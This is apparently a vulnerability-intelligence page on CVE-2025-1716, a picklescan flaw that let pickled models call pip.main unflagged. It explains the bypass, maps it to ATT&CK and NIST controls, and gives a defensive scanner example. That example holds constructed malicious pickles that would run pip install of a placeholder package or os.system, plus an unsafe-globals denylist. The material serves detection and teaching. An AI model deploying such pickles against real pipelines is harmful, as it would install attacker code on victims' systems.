Cyber Resilience

CVE-2025-1716

Severity: Medium · Public PoC referenced

Published: 26 February 2025
Modified: 29 December 2025
KEV added: not listed
Patch: available (picklescan 0.0.21)
CVSS v4.0 base score: 5.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N)
EPSS score: 0.1625 (95.0th percentile)
Risk Priority: 20 (weighting: 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2025-1716 is a medium-severity Incomplete List of Disallowed Inputs (CWE-184) vulnerability in Mmaitre314 Picklescan. Its CVSS base score is 5.3 (Medium).

Operationally, exploitation maps to the MITRE ATT&CK technique Python (T1059.006). The CVE ranks in the top 5.0% of CVEs by EPSS exploit likelihood, is not currently listed in the CISA KEV catalog, and has a public proof-of-concept referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-2 (Flaw Remediation) and RA-5 (Vulnerability Monitoring and Scanning).

Deeper analysis

picklescan versions prior to 0.0.21 contain a flaw in which the scanner does not classify the 'pip' module as an unsafe global when inspecting pickled Python objects. The affected component is the picklescan library itself, which is used to detect dangerous constructs in serialized machine-learning models before they are loaded.

An attacker can therefore craft a malicious pickled model whose opcode stream resolves pip.main and calls it with install arguments, fetching an arbitrary package from PyPI or a GitHub-hosted repository. Because the reference to pip is not flagged, the model passes the scan; when it is later deserialized the install runs, and the attacker-supplied package can execute code at install or import time, giving unauthorized code execution or environment tampering with no user interaction beyond loading the model.

The GitHub advisory GHSA-655q-fx9r-782v and the referenced commit 78ce704227c51f070c0c5fb4b466d92c62a7aa3d correct the issue by adding 'pip' to the set of restricted globals; Sonatype has mirrored the same remediation guidance for CVE-2025-1716.
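To make the denylist gap concrete, here is an added example (not picklescan's own code and not the advisory's proof of concept): a minimal scanner that walks a pickle's opcode stream with pickletools.genops, collects every global the pickle would import, and checks them against a denylist. Two constructed pickles encode the pip.main(['install', ...]) call described above, one with the protocol-0 GLOBAL opcode and one with protocol-4 STACK_GLOBAL; they are parsed only and never loaded. The denylists, the function names referenced_globals and scan, and the package name 'evil-package' are illustrative assumptions; the first denylist reproduces the pre-0.0.21 condition by omitting pip, the second adds it as the fix did.

```python
from __future__ import annotations

import pickle
import pickletools

# Opcodes whose argument is a string operand that a later STACK_GLOBAL may consume.
_STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
               "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """Return every (module, name) the pickle would import, without loading it.

    pickletools.genops only decodes opcodes, so nothing is executed. GLOBAL
    (protocols 0-3) carries "module name" as its argument; STACK_GLOBAL
    (protocol 4+) takes both from the operand stack, so string operands are
    tracked and the last two are popped. Simplification: memo PUT/GET
    references are not followed, so a STACK_GLOBAL whose operands come from
    the memo raises an error rather than being silently missed.
    """
    found: list[tuple[str, str]] = []
    strings: list[str] = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            if len(strings) < 2:
                raise ValueError("STACK_GLOBAL operands not on the tracked stack")
            name = strings.pop()
            module = strings.pop()
            found.append((module, name))
        elif op.name in _STRING_OPS:
            strings.append(str(arg))
    return found


def scan(data: bytes, denylist: dict[str, object]) -> list[tuple[str, str]]:
    """Return the referenced globals that the denylist forbids.

    denylist maps module -> "*" (every attribute) or a set of attribute names.
    The shape is an assumption chosen for this example, not picklescan's table.
    """
    flagged = []
    for module, name in referenced_globals(data):
        rule = denylist.get(module)
        if rule == "*" or (isinstance(rule, set) and name in rule):
            flagged.append((module, name))
    return flagged


# Illustrative denylists (assumptions, not picklescan's real tables). The first
# reproduces the CVE-2025-1716 condition: common modules are listed, pip is not.
DENYLIST_BEFORE_FIX: dict[str, object] = {
    "os": "*",
    "subprocess": "*",
    "builtins": {"eval", "exec", "compile", "open", "__import__"},
}
DENYLIST_AFTER_FIX: dict[str, object] = {**DENYLIST_BEFORE_FIX, "pip": "*"}

# Constructed protocol-0 pickle. Loading it would call
# pip.main(["install", "evil-package"]); "evil-package" is a placeholder name.
# It is only parsed here and never passed to pickle.loads.
PIP_INSTALL_P0 = (
    b"cpip\nmain\n"        # GLOBAL  pip.main
    b"(("                  # MARK, MARK
    b"S'install'\n"        # STRING  'install'
    b"S'evil-package'\n"   # STRING  'evil-package'
    b"l"                   # LIST    -> ['install', 'evil-package']
    b"t"                   # TUPLE   -> (['install', 'evil-package'],)
    b"R"                   # REDUCE  -> pip.main(*tuple)
    b"."                   # STOP
)

# Same call encoded with protocol-4 opcodes: module and attribute arrive as
# string operands and STACK_GLOBAL resolves them.
PIP_INSTALL_P4 = (
    b"\x80\x04"            # PROTO 4
    b"\x8c\x03pip"         # SHORT_BINUNICODE 'pip'
    b"\x8c\x04main"        # SHORT_BINUNICODE 'main'
    b"\x93"                # STACK_GLOBAL     -> pip.main
    b"]("                  # EMPTY_LIST, MARK
    b"\x8c\x07install"
    b"\x8c\x0cevil-package"
    b"e"                   # APPENDS -> ['install', 'evil-package']
    b"\x85"                # TUPLE1
    b"R."                  # REDUCE, STOP
)

# A classic os.system payload, which even the pre-fix list catches.
OS_SYSTEM_P0 = b"cos\nsystem\n(S'id'\ntR."

# A benign "model" of plain containers and floats references no globals at all.
BENIGN_MODEL = pickle.dumps({"arch": "mlp", "weights": [0.1, -0.2, 0.3]}, protocol=4)


if __name__ == "__main__":
    samples = [("pip proto0", PIP_INSTALL_P0), ("pip proto4", PIP_INSTALL_P4),
               ("os.system", OS_SYSTEM_P0), ("benign", BENIGN_MODEL)]
    for label, blob in samples:
        print(f"{label:11} imports={referenced_globals(blob)} "
              f"before_fix={scan(blob, DENYLIST_BEFORE_FIX)} "
              f"after_fix={scan(blob, DENYLIST_AFTER_FIX)}")
```

Running the script prints what each blob would import and what each denylist flags: both pip pickles pass the pre-fix list while the os.system pickle is caught, and the post-fix list flags pip.main in both encodings. That is the CWE-184 lesson for any denylist-based scanner: coverage is exactly the list, and a single missing module (here pip, whose main() reaches the network and the package manager) is a complete bypass. The stack tracking above is deliberately simplified and does not follow memo PUT/GET references, which a production scanner must.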

The associated EPSS score has remained flat at 0.1625 since disclosure, indicating no measurable rise in observed exploitation interest, though the vulnerability is directly relevant to machine-learning pipelines that depend on pickle-based model serialization.


Vulnerability details

picklescan before 0.0.21 does not treat 'pip' as an unsafe global. An attacker could craft a malicious model that uses Pickle to pull in a malicious PyPI package (hosted, for example, on pypi.org or GitHub) via `pip.main()`. Because pip is not a restricted global, the model, when scanned with picklescan, would pass security checks and appear to be safe, when it could instead prove to be problematic.

CWE(s)

CWE-184 Incomplete List of Disallowed Inputs

Related Threats

MITRE ATT&CK Enterprise Techniques

T1059.006 Python (Execution)
Adversaries may abuse Python commands and scripts for execution.
T1105 Ingress Tool Transfer (Command and Control)
Adversaries may transfer tools or other files from an external system into a compromised environment.
T1203 Exploitation for Client Execution (Execution)
Adversaries may exploit software vulnerabilities in client applications to execute code.
T1211 Exploitation for Stealth (Stealth)
Adversaries may exploit vulnerabilities to evade detection by hiding activity, suppressing logging, or operating within trusted or unmonitored components.
Why these techniques?

A picklescan build that omits pip from its unsafe globals lets a malicious pickle evade static analysis (T1211); loading that pickle is client-side code execution through unsafe deserialization (T1203); the payload abuses the Python interpreter to invoke pip.main (T1059.006); and the resulting install pulls a malicious package from PyPI or GitHub into the environment (T1105).

CVEs Like This One

CVE-2025-10156 (same product: mmaitre314 picklescan)
CVE-2025-1945 (same product: mmaitre314 picklescan)
CVE-2025-1889 (same product: mmaitre314 picklescan)
CVE-2026-41206 (shared CWE-184)
CVE-2026-41264 (shared CWE-184)
CVE-2026-33139 (shared CWE-184)
CVE-2026-41934 (shared CWE-184)
CVE-2026-31992 (shared CWE-184)
CVE-2026-1773 (shared CWE-184)
CVE-2026-32017 (shared CWE-184)

Affected Assets

mmaitre314 picklescan, versions ≤ 0.0.22

The advisory names 0.0.21 as the first release that restricts 'pip'; when matching installed versions, confirm the range against the advisory rather than relying on this list alone.

Mitigating Controls (NIST 800-53 r5)

SI-2 Flaw Remediation (prevent)
Flaw remediation ensures timely upgrading of picklescan to version 0.0.21 or later, directly addressing the failure to restrict 'pip' as an unsafe global.

SI-3 Malicious Code Protection (prevent, detect)
Malicious code protection, for example endpoint or pipeline scanning independent of picklescan, provides a second check for pickle files that bypass picklescan and invoke pip to install harmful PyPI packages.

RA-5 Vulnerability Monitoring and Scanning (detect)
Vulnerability monitoring and scanning identifies the CVE-2025-1716 flaw in picklescan versions before 0.0.21 for remediation.
